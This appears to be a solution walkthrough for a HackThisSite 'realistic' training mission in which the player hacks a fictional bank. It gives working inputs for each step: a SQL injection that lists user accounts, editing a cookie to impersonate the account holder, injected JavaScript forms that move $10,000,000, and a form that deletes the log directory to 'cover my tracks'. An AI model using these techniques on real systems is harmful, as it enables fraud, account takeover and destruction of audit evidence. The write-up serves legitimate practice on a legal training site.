• Level: Realistic::8 (United Banks Of America)

• URL: http://www.hackthissite.org/missions/realistic/8/
• Difficulty :
• Exercise: One of America's Richest Men plans to donate $10,000,000 to a campaign set on hunting down hackers and locking them up. Please, if you can't do this, then we're all screwed. Can you hack in and move the money?

Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:

1. Find the account of Gary Hunter (I don't know his account name).
2. Move the $10,000,000 into the account dropCash.
3. Clear The Logs, They're held in the folder 'logFiles'.

I really hope you can do this, because if you can't we're all screwed

• Solution:

Information

From the navigation and source code of pages, we gather following information:

Description	Page	Fields
Register pages	Register.php > register2.php	<input type="text" name="username" maxlength=10> <input type="password" name="password" maxlength=50> <textarea name="desc" rows=5 cols=20 maxlength=255>
Login pages	login1.php > login2.php	<input type="text" name="username" value="Enter Username"> <input type="password" name="Password" value="">
Purge files	cleardir.php	<input type='hidden' name='dir' value='loginSQLFiles'>
Transfer money from one account to another	movemoney.php	<input type='text' name='TO' value='Username To Give Money To'> <input type='text' name='AMOUNT' value='Amount Of Money To Move'>

Authentication cookie (created after successful authentication):

• accountUsername=<login>
• accountPassword=<password>

Our target:

• Name: Garry Hunter
• Transfer $10,000,000 into the account dropCash.
• Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ' or 'a'='a.

By scrolling down, we find:

GaryWilliamHunter : -- $$$$$ --

The 2 values are separated by a colon:

• Before colon: the login (GaryWilliamHunter)
• After colon: the description (-- $$$$$ --)

Objective 2: Move the $10,000,000 into the account dropCash

By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.

javascript:alert(document.cookie);

Install Firebug and Firecookie for Firefox. We then have to change value of cookie named "accountUsername" to "GaryWilliamHunter" and use following JS injection (copy/paste in the URL):

javascript:void(document.write('<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>'))

It will dynamically write a form on the page, containing necessary values for a transfer:

• FORM ACTION: movemoney.php, as specified in the exercise
• FROM: value taken from the modified cookie (GaryWilliamHunter)
• TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
• AMOUNT: value specified in the exercise. We know this field from the information we gathered.

By validating the form, it will complete the stage.

Objective 3: Clear The Logs, They're held in the folder 'logFiles'

Copy/paste following code in the URL:

javascript:void(document.write('<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value="cover my tracks" /></form>'))

Comments